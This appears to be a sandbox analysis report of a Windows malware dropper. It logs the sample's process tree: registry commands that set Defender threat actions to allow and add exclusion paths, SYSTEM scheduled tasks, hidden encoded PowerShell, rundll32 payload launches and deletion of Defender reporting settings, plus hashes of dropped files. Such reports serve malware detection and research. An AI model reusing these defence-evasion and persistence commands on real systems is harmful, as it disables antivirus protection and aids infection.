C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2680
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4700
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3648
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:1548
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:756
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:1376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:2960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:5084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2364
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1128
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5048
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4824
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:1520
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:3500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:3432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:3056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3776
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QxhTRhBLgDrU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QxhTRhBLgDrU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TloWHzQxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TloWHzQxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eSoSRLDipKupC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eSoSRLDipKupC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wqPaCWxmyWUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wqPaCWxmyWUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zopNtCPofqZRshxFhVR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zopNtCPofqZRshxFhVR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MIOQmlFchkRGycVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\MIOQmlFchkRGycVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\erSyCIiXgZXqUzOL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\erSyCIiXgZXqUzOL\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3376 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QxhTRhBLgDrU2" /t REG_DWORD /d 0 /reg:323⤵PID:1668
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QxhTRhBLgDrU2" /t REG_DWORD /d 0 /reg:324⤵PID:4188
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QxhTRhBLgDrU2" /t REG_DWORD /d 0 /reg:643⤵PID:2664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TloWHzQxU" /t REG_DWORD /d 0 /reg:323⤵PID:1360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TloWHzQxU" /t REG_DWORD /d 0 /reg:643⤵PID:1716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSoSRLDipKupC" /t REG_DWORD /d 0 /reg:323⤵PID:2260
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eSoSRLDipKupC" /t REG_DWORD /d 0 /reg:643⤵PID:4372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wqPaCWxmyWUn" /t REG_DWORD /d 0 /reg:323⤵PID:2612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wqPaCWxmyWUn" /t REG_DWORD /d 0 /reg:643⤵PID:2808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zopNtCPofqZRshxFhVR" /t REG_DWORD /d 0 /reg:323⤵PID:5036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zopNtCPofqZRshxFhVR" /t REG_DWORD /d 0 /reg:643⤵PID:1480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\MIOQmlFchkRGycVB /t REG_DWORD /d 0 /reg:323⤵PID:1676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\MIOQmlFchkRGycVB /t REG_DWORD /d 0 /reg:643⤵PID:1208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL /t REG_DWORD /d 0 /reg:323⤵PID:3704
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\nspRkilinDmReSHdL /t REG_DWORD /d 0 /reg:643⤵PID:444
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\erSyCIiXgZXqUzOL /t REG_DWORD /d 0 /reg:323⤵PID:4332
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\erSyCIiXgZXqUzOL /t REG_DWORD /d 0 /reg:643⤵PID:1732
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gwiVWaKgU" /SC once /ST 11:28:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:1808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gwiVWaKgU"2⤵PID:2164
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gwiVWaKgU"2⤵PID:2680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jAPQkthTMSklmsWLq" /SC once /ST 02:33:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\erSyCIiXgZXqUzOL\GVSABzKakgckLNM\ZYSWaGa.exe\" 4P /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "jAPQkthTMSklmsWLq"2⤵PID:3260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2236 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2184
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1636
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:856
-
C:\Windows\Temp\erSyCIiXgZXqUzOL\GVSABzKakgckLNM\ZYSWaGa.exeC:\Windows\Temp\erSyCIiXgZXqUzOL\GVSABzKakgckLNM\ZYSWaGa.exe 4P /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1300 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bhiKLDYYmOVJYRnmNA"2⤵PID:4000
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4924
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4888
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4336
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TloWHzQxU\xcJoxY.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rSkSwYHQOxYzETV" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rSkSwYHQOxYzETV2" /F /xml "C:\Program Files (x86)\TloWHzQxU\yJMXuEH.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "rSkSwYHQOxYzETV"2⤵PID:868
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rSkSwYHQOxYzETV"2⤵PID:3508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GdxfyAawfiNbBt" /F /xml "C:\Program Files (x86)\QxhTRhBLgDrU2\LYHrjRo.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3840
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OxFcncghDbRjM2" /F /xml "C:\ProgramData\MIOQmlFchkRGycVB\VgcNeVM.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ktKVYLJneUOMgXpHm2" /F /xml "C:\Program Files (x86)\zopNtCPofqZRshxFhVR\wLuLAAl.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "uEWnBcEBihOfoSaLKpA2" /F /xml "C:\Program Files (x86)\eSoSRLDipKupC\MbsKZxr.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3036
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lCFTjNOFEcSKwrIvx" /SC once /ST 16:33:41 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\erSyCIiXgZXqUzOL\JHdnZXQl\rAuzZob.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2176
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "lCFTjNOFEcSKwrIvx"2⤵PID:384
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:2168
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:456
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:1032
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1768
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jAPQkthTMSklmsWLq"2⤵PID:3360
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\erSyCIiXgZXqUzOL\JHdnZXQl\rAuzZob.dll",#1 /site_id 5254031⤵PID:1732
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\erSyCIiXgZXqUzOL\JHdnZXQl\rAuzZob.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:1212 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lCFTjNOFEcSKwrIvx"3⤵PID:3988
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD586220b28a352fcfea3c6811fb42f069b
SHA15863ab9098e52e34ad4872cd61dcab5a8b5486c5
SHA2568aa4492360d275f694ffd12479b40348395a108a78ce8b70b4bcbf307475a8d4
SHA512565b692e4cfc3af63f075d8075c41821d710836941502cd0fecfc0d3a647c27af42776ba7f369bc17e7676e4b3a113d7dd045f7f180ed6a478db7fb706c67868
-
Filesize
2KB
MD55a6fa41749267bacc58036920c314400
SHA1aaa01fb6a9c3dabec62334661cdc5f7c06c2aee5
SHA256268e2833f23a6e806e2546f2e8ac3645c12d6832e08c63eed0216f6ecfeed3a0
SHA51215e1a0e6db84b878df931bf22ea45d2d8249b6529061f6b8067b21d47a0b4c9dc6ff9a44c0cca10db8aedcf63f44cddbad28ceb5d1f7c47ec7087d85b0dbb359
-
Filesize
2KB
MD5ff18af497a7c83f4ff49ba6f63245bc5
SHA1fab28da120d53a7d28bf30737c76b856d8d4ad5a
SHA25643a7735053eeecad8b363b47913a5269cc92720e6c857a752e184c2a8cfc0e46
SHA512a9856dd0837d87f859b184e63ee2733ee4631273fe3e7baf287d7ae6408f3c97ebcb2bded4bbf7668439251ec333e78ed5e26842081102336cb34bd8dcfcf0f5
-
Filesize
2KB
MD58d69da6003c346082b6c8c7678100cca
SHA13105b879fece85ec3881451c6d8a19b7b3a51d21
SHA2564083f11263ccbb851568baa29ad3e741fb8e3ea19b069c2b9b220b34bf7c5574
SHA5122934d773cba6cc2f864f6cac99c458daf287ac560c3b7f8d897e827d59755118c7a3b324fa3ba9fd74f8bae257bf123363589781cbaf5d49cd62c9b379c7cf46
-
Filesize
2KB
MD5a2e47a78304f177618e9a531c7f50827
SHA186f057cbbcc4ecae9176d1876201af10112da8d3
SHA256a82bb216e8b72a7f7708948c88f0c54e4214459aed52244b191c870cb0fefe3d
SHA5129734f91dbb653dfc370ca2f9c55ef221e045fe4db54a5955c064ca049abcb2babe3136aa1cf9f3259e72b177d28ba51493941eb7f3267d3d83bbd4f0e52cfbbd
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
6.3MB
MD51cc012d27e09045e5bc36642cc6d73ba
SHA1849f7fc78aef49c20dbc39a8134d6b667fc4c384
SHA256e9adbf11fe67f07b28e4339f3b0ba628b1b32e18f2f82984af811034afbd4c0f
SHA512bd27da3da0d51405b9b5be792db2b19173c8eacb8ad82f5944ec064acfffa97572cc65e614fc51b57eb6cefb7b8659620bd90d91f34a5817ffbf1863bc978c70
-
Filesize
6.3MB
